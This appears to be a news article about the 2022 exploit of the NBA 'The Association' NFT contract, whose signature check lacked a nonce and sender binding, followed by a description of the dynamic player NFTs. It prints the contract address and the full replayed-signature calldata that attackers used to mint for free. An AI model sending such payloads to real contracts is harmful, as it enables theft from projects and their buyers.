There were a number of problems with the release of NBA: The Association NFT. Web3 and Ethereum specialists were able to discover the hex code that allowed you to create these free NFTs without being on the allowlist for early releases.
To put it simply, users could “loop” or use software that would produce 1 NFT for each wallet they created. But it gets worse, even though the contract was paused multiple times, these exploiters were able to create new hashes that would mint 100 NFTs per transaction, sending gas soaring and quickly selling the project out.
How did they exploit NBA: The Association NFT collection?
According to the smart contract auditor firm BlockSec, the Association NFT has a hole that allows a non-approved user to mint the digital collectible by mimicking the investors’ signatures given early access to the assets.
The #AssociationNFT contract has a vulnerability. The verify function does not
1) have a nonce so that it can be used only once
2) bind the msg sender with the signer@NBAxNFT
@defiprime pic.twitter.com/NsCsBFo2Yo— BlockSec (@BlockSecTeam) April 21, 2022
The attackers abused a loophole and by sending 0 ETH to the contract address below using this hex were be able to mint as many as they wanted (though this currently doesn’t work).
<code> Contract address: 0xdd5a649fc076886dfd4b9ad6acfc9b5eb882e83c </code>
<code> Hex: 0x8df9da460000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000000A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000374a99d809928d2e230e66c1cb985a1ed7032a070000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014b230ce30000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000041570921b473b5f3fe583331074ade2b2015132283f7e966101f5da8ca93ca8f20073216a771d2c81fdebf07e0f307aa0e12bfcf42a38df3033b9590b140ecffb51b00000000000000000000000000000000000000000000000000000000000000 </code>
Despite the exploits, the project doesn’t seem to be affected. The floor for these free NFTs is currently at about 0.3 ETH. Exploiters are sitting pretty, but does it matter if a contract is inefficient or exploited at launch?
After the collection has been minted, players will be assigned randomly and transparently using Chainlink VRF. Everyone has a fair and equal chance of minting any player from any of the 16 Playoff teams. The Association NFT collection will be distributed in a blind-mint, recipients of the 2022 NBA Playoffs NFTs won’t know who they will receive until April 22nd. We recently covered another crypto blunder with a $182 million heist, and I think these things are getting out of hand.
The Association NFT collection include dynamic player NFTs
The Association NFT is a dynamic collection of NFTs that change appearance over time based on team and player on-court success. For the 2022 NBA Playoffs 18,000 total NFTs, 75 per player will be produced. The Association NFTs are linked to real-time data feeds and computations for each team and player via Chainlink Oracle. This allows the appearance of each player’s NFT to change in an automated manner based on pre-set goals entered into the Galaxis smart contract.
The more a player achieves throughout the Playoffs, the more visual modifications such as backgrounds, player accessories, and emojis created by a variety of artists their NFT will have. Also, each player’s NFT may be upgraded through Traits and Accessories, based on the player’s on-court performance and accomplishments. Progressionary traits are modified if the statistic is achieved in 1, 2, or 3+ games. By the way, Twitter rolls out special hashflags and events for NBA All-Star Weekend.
